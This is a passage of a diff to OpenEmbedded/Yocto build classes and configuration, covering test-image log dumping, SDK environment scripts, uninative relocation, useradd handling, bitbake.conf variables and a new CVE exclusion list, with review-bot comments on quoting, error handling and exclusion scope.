107 export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
108 ping -c3 $DEFAULT_GATEWAY
109 dmesg
110 netstat -an
111 ip address
112 # Next command will dump logs from /var/log/
113 find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
114} 102}
115 103
116testimage_dump_host () { 104testimage_dump_host () {
117 top -bn1
118 iostat -x -z -N -d -p ALL 20 2
119 ps -ef
120 free
121 df
122 memstat
123 dmesg
124 ip -s link
125 netstat -an
126} 105}
127 106
128python do_testimage() { 107python do_testimage() {
@@ -193,6 +172,7 @@ def testimage_main(d):
193 import json 172 import json
194 import signal 173 import signal
195 import logging 174 import logging
175 import shutil
196 176
197 from bb.utils import export_proxies 177 from bb.utils import export_proxies
198 from oeqa.core.utils.misc import updateTestData 178 from oeqa.core.utils.misc import updateTestData
@@ -228,9 +208,10 @@ def testimage_main(d):
228 208
229 tdname = "%s.testdata.json" % image_name 209 tdname = "%s.testdata.json" % image_name
230 try: 210 try:
231 td = json.load(open(tdname, "r")) 211 with open(tdname, "r") as f:
232 except (FileNotFoundError) as err: 212 td = json.load(f)
233 bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname) 213 except FileNotFoundError as err:
214 bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
234 215
235 # Some variables need to be updates (mostly paths) with the 216 # Some variables need to be updates (mostly paths) with the
236 # ones of the current environment because some tests require them. 217 # ones of the current environment because some tests require them.
@@ -397,10 +378,17 @@ def testimage_main(d):
397 get_testimage_result_id(configuration), 378 get_testimage_result_id(configuration),
398 dump_streams=d.getVar('TESTREPORT_FULLLOGS')) 379 dump_streams=d.getVar('TESTREPORT_FULLLOGS'))
399 results.logSummary(pn) 380 results.logSummary(pn)
381
382 # Copy additional logs to tmp/log/oeqa so it's easier to find them
383 targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN"))
384 os.makedirs(targetdir, exist_ok=True)
385 os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog)))
386 os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME'))))
387
400 if not results or not complete: 388 if not results or not complete:
401 bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True) 389 bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
402 if not results.wasSuccessful(): 390 if not results.wasSuccessful():
403 bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True) 391 bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
404 392
405def get_runtime_paths(d): 393def get_runtime_paths(d):
406 """ 394 """
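Review bot: The two `os.symlink` calls added to testimage_main run before the `bb.fatal` result checks and raise FileExistsError when a link of the same name already exists in targetdir, a directory that `os.makedirs(targetdir, exist_ok=True)` suggests is reused between runs. The BB_LOGFILE link name carries DATETIME, but the bootlog link is only `os.path.basename(bootlog)`; if that name is stable across runs (bootlog is set outside the hunk), a second run aborts here and hides the real test outcome. Removing a stale link first, e.g. `if os.path.lexists(link): os.remove(link)` before each `os.symlink`, or catching FileExistsError, avoids that. The hunk also adds `import shutil`, which none of the visible new lines use; the function continues outside the hunks, so it may be used there.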
diff --git a/meta/classes/toolchain-scripts.bbclass b/meta/classes/toolchain-scripts.bbclass
index db1d3215ef..21762b803b 100644
--- a/meta/classes/toolchain-scripts.bbclass
+++ b/meta/classes/toolchain-scripts.bbclass
@@ -29,7 +29,7 @@ toolchain_create_sdk_env_script () {
29 echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script 29 echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script
30 echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script 30 echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script
31 echo '# Only disable this check if you are absolutely know what you are doing!' >> $script 31 echo '# Only disable this check if you are absolutely know what you are doing!' >> $script
32 echo 'if [ ! -z "$LD_LIBRARY_PATH" ]; then' >> $script 32 echo 'if [ ! -z "${LD_LIBRARY_PATH:-}" ]; then' >> $script
33 echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script 33 echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script
34 echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script 34 echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script
35 echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script 35 echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script
@@ -44,7 +44,7 @@ toolchain_create_sdk_env_script () {
44 for i in ${CANADIANEXTRAOS}; do 44 for i in ${CANADIANEXTRAOS}; do
45 EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i" 45 EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i"
46 done 46 done
47 echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':$PATH' >> $script 47 echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':"$PATH"' >> $script
48 echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script 48 echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script
49 echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script 49 echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script
50 echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script 50 echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script
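Review bot: The quoting added to the PATH export at new line 47 is not carried over to the neighbouring exports at lines 48-50, which still write unquoted expansions such as `export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT` into the environment script. In shells that treat `export` as an ordinary builtin an unquoted value is word-split, so these lines would presumably fail the same way PATH did if the sysroot path contained whitespace. Quoting them consistently, e.g. `echo 'export PKG_CONFIG_SYSROOT_DIR="$SDKTARGETSYSROOT"' >> $script`, keeps the generated script behaving the same across shells. The SDK-path prefix of the PATH line is also still outside the new quotes. toolchain_create_sdk_env_script starts and ends outside both hunks.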
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97..4d4f53ad4d 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
2UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}" 2UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
3 3
4UNINATIVE_URL ?= "unset" 4UNINATIVE_URL ?= "unset"
5UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz" 5UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
6# Example checksums 6# Example checksums
7#UNINATIVE_CHECKSUM[aarch64] = "dead" 7#UNINATIVE_CHECKSUM[aarch64] = "dead"
8#UNINATIVE_CHECKSUM[i686] = "dead" 8#UNINATIVE_CHECKSUM[i686] = "dead"
@@ -34,6 +34,8 @@ python uninative_event_fetchloader() {
34 with open(loaderchksum, "r") as f: 34 with open(loaderchksum, "r") as f:
35 readchksum = f.read().strip() 35 readchksum = f.read().strip()
36 if readchksum == chksum: 36 if readchksum == chksum:
37 if "uninative" not in d.getVar("SSTATEPOSTUNPACKFUNCS"):
38 enable_uninative(d)
37 return 39 return
38 40
39 import subprocess 41 import subprocess
@@ -100,7 +102,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
100 ${UNINATIVE_LOADER} \ 102 ${UNINATIVE_LOADER} \
101 ${UNINATIVE_LOADER} \ 103 ${UNINATIVE_LOADER} \
102 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \ 104 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
103 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum) 105 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
104 subprocess.check_output(cmd, shell=True) 106 subprocess.check_output(cmd, shell=True)
105 107
106 with open(loaderchksum, "w") as f: 108 with open(loaderchksum, "w") as f:
@@ -167,5 +169,7 @@ python uninative_changeinterp () {
167 if not elf.isDynamic(): 169 if not elf.isDynamic():
168 continue 170 continue
169 171
172 os.chmod(f, s[stat.ST_MODE] | stat.S_IWUSR)
170 subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT) 173 subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT)
174 os.chmod(f, s[stat.ST_MODE])
171} 175}
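Review bot: In the last hunk (uninative_changeinterp, new lines 172-174) the original mode is restored only when patchelf-uninative succeeds. If `subprocess.check_output` raises, the second `os.chmod` is skipped and the file keeps the added owner-write bit. Wrapping the call as `try:` ... `finally: os.chmod(f, s[stat.ST_MODE])` restores the mode on both paths. `s` is assigned outside the hunk, presumably from a stat of `f`, and the function also begins outside the hunk.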
diff --git a/meta/classes/useradd-staticids.bbclass b/meta/classes/useradd-staticids.bbclass
index 3a1b5f1320..908b24969f 100644
--- a/meta/classes/useradd-staticids.bbclass
+++ b/meta/classes/useradd-staticids.bbclass
@@ -41,7 +41,7 @@ def update_useradd_static_config(d):
41 def handle_missing_id(id, type, pkg, files, var, value): 41 def handle_missing_id(id, type, pkg, files, var, value):
42 # For backwards compatibility we accept "1" in addition to "error" 42 # For backwards compatibility we accept "1" in addition to "error"
43 error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC') 43 error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC')
44 msg = "%s - %s: %sname %s does not have a static ID defined." % (d.getVar('PN'), pkg, type, id) 44 msg = 'Recipe %s, package %s: %sname "%s" does not have a static ID defined.' % (d.getVar('PN'), pkg, type, id)
45 if files: 45 if files:
46 msg += " Add %s to one of these files: %s" % (id, files) 46 msg += " Add %s to one of these files: %s" % (id, files)
47 else: 47 else:
diff --git a/meta/classes/useradd.bbclass b/meta/classes/useradd.bbclass
index e5f3ba24f9..0f0ed3446d 100644
--- a/meta/classes/useradd.bbclass
+++ b/meta/classes/useradd.bbclass
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () {
230 preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd') 230 preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd')
231 preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems') 231 preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems')
232 preinst += d.getVar('useradd_preinst') 232 preinst += d.getVar('useradd_preinst')
233 # Expand out the *_PARAM variables to the package specific versions
234 for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]:
235 val = d.getVar(rep + "_" + pkg) or ""
236 preinst = preinst.replace("${" + rep + "}", val)
233 d.setVar('pkg_preinst_%s' % pkg, preinst) 237 d.setVar('pkg_preinst_%s' % pkg, preinst)
234 238
235 # RDEPENDS setup 239 # RDEPENDS setup
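Review bot: The loop at new lines 234-236 pastes the package-specific GROUPADD_PARAM, USERADD_PARAM and GROUPMEMS_PARAM values into the preinst text with a plain `str.replace`, so they reach the generated shell script verbatim. How the template quotes `${USERADD_PARAM}` is not visible here, but if it sits inside double quotes, a value containing a double quote, `$` or a backtick would change what the preinst script runs at install time. I would at least document the constraint next to the loop, for example `# values are inserted verbatim into shell code; they must not contain unescaped quotes, $ or backticks`. populate_packages_prepend begins and ends outside the hunk.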
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index cd3d05709e..99f68f7505 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -233,7 +233,7 @@ create_cmdline_wrapper () {
233#!/bin/bash 233#!/bin/bash
234realpath=\`readlink -fn \$0\` 234realpath=\`readlink -fn \$0\`
235realdir=\`dirname \$realpath\` 235realdir=\`dirname \$realpath\`
236exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@" 236exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
237END 237END
238 chmod +x $cmd 238 chmod +x $cmd
239} 239}
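Review bot: The rewritten `exec` line at new line 236 expands `\$realdir` unquoted, so a wrapper installed under a directory whose name contains whitespace would be word-split before exec sees the path. Quoting both uses keeps each path a single argument: `exec -a "\$realdir/$cmdname" "\$realdir/$cmdname.real" $cmdoptions "\$@"`. The two assignments above it follow the same pattern (`readlink -fn \$0`, `dirname \$realpath`) and could be quoted the same way. The heredoc and create_cmdline_wrapper both start outside the hunk.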
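--- a/meta/conf/abi_version.conf
+++ b/meta/conf/abi_version.conf
@@ -12,4 +12,4 @@ OELAYOUT_ABI = "14"
 # a reset of the equivalence, for example when reproducibility issues break the
 # existing match data. Distros can also append to this value for the same effect.
 #
-HASHEQUIV_HASH_VERSION = "4"
+HASHEQUIV_HASH_VERSION = "5"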
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index 6ada0099eb..457b7790c2 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -421,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
421 421
422SDK_NAME_PREFIX ?= "oecore" 422SDK_NAME_PREFIX ?= "oecore"
423SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}" 423SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
424SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" 424SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
425SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}" 425SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
426# The path to default to installing the SDK to
427SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
426 428
427################################################################## 429##################################################################
428# Kernel info. 430# Kernel info.
@@ -480,7 +482,7 @@ export PATH
480# Build utility info. 482# Build utility info.
481################################################################## 483##################################################################
482 484
483# Directory where host tools are copied 485# Directory with symlinks to host tools used by build
484HOSTTOOLS_DIR = "${TMPDIR}/hosttools" 486HOSTTOOLS_DIR = "${TMPDIR}/hosttools"
485 487
486# Tools needed to run builds with OE-Core 488# Tools needed to run builds with OE-Core
@@ -500,7 +502,7 @@ HOSTTOOLS += " \
500HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}" 502HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}"
501 503
502# Link to these if present 504# Link to these if present
503HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo" 505HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo"
504 506
505# Temporary add few more detected in bitbake world 507# Temporary add few more detected in bitbake world
506HOSTTOOLS_NONFATAL += "join nl size yes zcat" 508HOSTTOOLS_NONFATAL += "join nl size yes zcat"
@@ -639,7 +641,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
639DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool" 641DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
640GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles" 642GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
641GNOME_GIT = "git://gitlab.gnome.org/GNOME" 643GNOME_GIT = "git://gitlab.gnome.org/GNOME"
642GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources" 644GNOME_MIRROR = "https://download.gnome.org/sources/"
643GNU_MIRROR = "https://ftp.gnu.org/gnu" 645GNU_MIRROR = "https://ftp.gnu.org/gnu"
644GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt" 646GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
645GPE_MIRROR = "http://gpe.linuxtogo.org/download/source" 647GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
@@ -687,7 +689,10 @@ SRC_URI = ""
687PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/" 689PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/"
688PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}" 690PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}"
689PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native" 691PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native"
690PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR},${WORKDIR}/pkgdata-sysroot,${TMPDIR}/sstate-control,${DEPLOY_DIR},${WORKDIR}/deploy-,${TMPDIR}/buildstats,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/sstate-build-image_complete,${TMPDIR}/sysroots-components,${BUILDHISTORY_DIR},${TMPDIR}/pkgdata,${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}" 692PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR}"
693PSEUDO_IGNORE_PATHS .= ",${TMPDIR}/sstate-control,${TMPDIR}/buildstats,${TMPDIR}/sysroots-components,${TMPDIR}/pkgdata"
694PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/deploy-,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/pkgdata-sysroot"
695PSEUDO_IGNORE_PATHS .= ",${DEPLOY_DIR},${BUILDHISTORY_DIR},${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}"
691 696
692export PSEUDO_DISABLED = "1" 697export PSEUDO_DISABLED = "1"
693#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}" 698#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}"
@@ -892,7 +897,7 @@ BB_HASHCONFIG_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} DATE TIME SSH_AGENT_PID \
892 PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \ 897 PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \
893 GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \ 898 GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \
894 HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \ 899 HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \
895 BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT" 900 BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT BB_NICE_LEVEL"
896BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \ 901BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \
897 lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \ 902 lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \
898 file-checksums python func task export unexport noexec nostamp dirs cleandirs \ 903 file-checksums python func task export unexport noexec nostamp dirs cleandirs \
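Review bot: The PSEUDO_IGNORE_PATHS rewrite at new lines 692-695 reads like a pure regrouping into `.=` lines, but `${WORKDIR}/sstate-build-image_complete` from the old value does not appear in any of the four new lines. If dropping it is intended, a comment should say so, e.g. `# sstate-build-image_complete is deliberately not ignored: <reason>`; if it is not, the entry belongs back on the `${WORKDIR}` line. This list decides which paths pseudo stops tracking, so a silent change here can presumably alter the ownership and mode recorded for files under that path.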
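--- /dev/null
+++ b/meta/conf/distro/include/cve-extra-exclusions.inc
@@ -0,0 +1,75 @@
+# This file contains a list of CVE's where resolution has proven to be impractical
+# or there is no reasonable action the Yocto Project can take to resolve the issue.
+# It contains all the information we are aware of about an issue and analysis about
+# why we believe it can't be fixed/handled. Additional information is welcome through
+# patches to the file.
+#
+# Include this file in your local.conf or distro.conf to exclude these CVE's
+# from the cve-check results or add to the bitbake command with:
+# -R conf/distro/include/cve-extra-exclusions.inc
+#
+# The file is not included by default since users should review this data to ensure
+# it matches their expectations and usage of the project.
+#
+# We may also include "in-flight" information about current/ongoing CVE work with
+# the aim of sharing that work and ensuring we don't duplicate it.
+#
+
+
+# strace https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0006
+# CVE is more than 20 years old with no resolution evident
+# broken links in CVE database references make resolution impractical
+CVE_CHECK_WHITELIST += "CVE-2000-0006"
+
+# epiphany https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0238
+# The issue here is spoofing of domain names using characters from other character sets.
+# There has been much discussion amongst the epiphany and webkit developers and
+# whilst there are improvements about how domains are handled and displayed to the user
+# there is unlikely ever to be a single fix to webkit or epiphany which addresses this
+# problem. Whitelisted as there isn't any mitigation or fix or way to progress this further
+# we can seem to take.
+CVE_CHECK_WHITELIST += "CVE-2005-0238"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4756
+# Issue is memory exhaustion via glob() calls, e.g. from within an ftp server
+# Best discussion in https://bugzilla.redhat.com/show_bug.cgi?id=681681
+# Upstream don't see it as a security issue, ftp servers shouldn't be passing
+# this to libc glob. Exclude as upstream have no plans to add BSD's GLOB_LIMIT or similar
+CVE_CHECK_WHITELIST += "CVE-2010-4756"
+
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29509
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29511
+# The encoding/xml package in go can potentially be used for security exploits if not used correctly
+# CVE applies to a netapp product as well as flagging a general issue. We don't ship anything
+# exposing this interface in an exploitable way
+CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511"
+
+# db
+# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with
+# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed.
+CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \
+CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \
+CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \
+CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \
+CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20255
+# There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html
+# qemu maintainers say the patch is incorrect and should not be applied
+# Ignore from OE's perspectivee as the issue is of low impact, at worst sitting in an infinite loop rather than exploitable
+CVE_CHECK_WHITELIST += "CVE-2021-20255"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12067
+# There was a proposed patch but rejected by upstream qemu. It is unclear if the issue can
+# still be reproduced or where exactly any bug is.
+# Ignore from OE's perspective as we'll pick up any fix when upstream accepts one.
+CVE_CHECK_WHITELIST += "CVE-2019-12067"
+
+# nasm:nasm-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18974
+# It is a fuzzing related buffer overflow. It is of low impact since most devices
+# wouldn't expose an assembler. The upstream is inactive and there is little to be
+# done about the bug, ignore from an OE perspective.
+CVE_CHECK_WHITELIST += "CVE-2020-18974"
+
+
+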
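Review bot: Several justifications in this new file describe what OE-Core itself ships, yet `CVE_CHECK_WHITELIST +=` excludes the CVE from cve-check results for every layer in a build that includes the file. The go entry (lines 40-45) is the clearest case: a downstream layer with a Go service that parses untrusted XML would no longer see CVE-2020-29509 or CVE-2020-29511 reported. I would state the scope in that comment, e.g. `# Assessment covers OE-Core recipes only; re-evaluate if your layers ship Go code using encoding/xml`. The db block (lines 47-54) also lacks the per-CVE links the other entries carry, and line 59 has the typo `perspectivee`.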
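--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
 # The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully
 # fetch from the network (and warn you if not). To disable the test set
 # the variable to be empty.
-# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master
-CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/"
+# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
+CONNECTIVITY_CHECK_URIS ?= "https://yoctoproject.org/connectivity.html"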
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index ff962a3be9..11a35a2c59 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
4# 4#
5# Please submit any patches against recipes in meta to the 5# Please submit any patches against recipes in meta to the
6# OE-Core mail list (openembedded-core@lists.openembedded.org) 6# OE-Core mail list (openembedded-core@lists.openembedded.org)
7# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org) 7# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
8# 8#
9# If you have problems with or questions about a particular recipe, feel 9# If you have problems with or questions about a particular recipe, feel
10# free to contact the maintainer directly (cc:ing the appropriate mailing list 10# free to contact the maintainer directly (cc:ing the appropriate mailing list
@@ -88,8 +88,8 @@ RECIPE_MAINTAINER_pn-builder = "Richard Purdie <richard.purdie@linuxfoundation.o
88RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>" 88RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
89RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>" 89RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
90RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>" 90RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>"
91RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@ti.com>" 91RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@denix.org>"
92RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@ti.com>" 92RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@denix.org>"
93RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>" 93RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>"
94RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>" 94RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>"
95RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>" 95RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>"
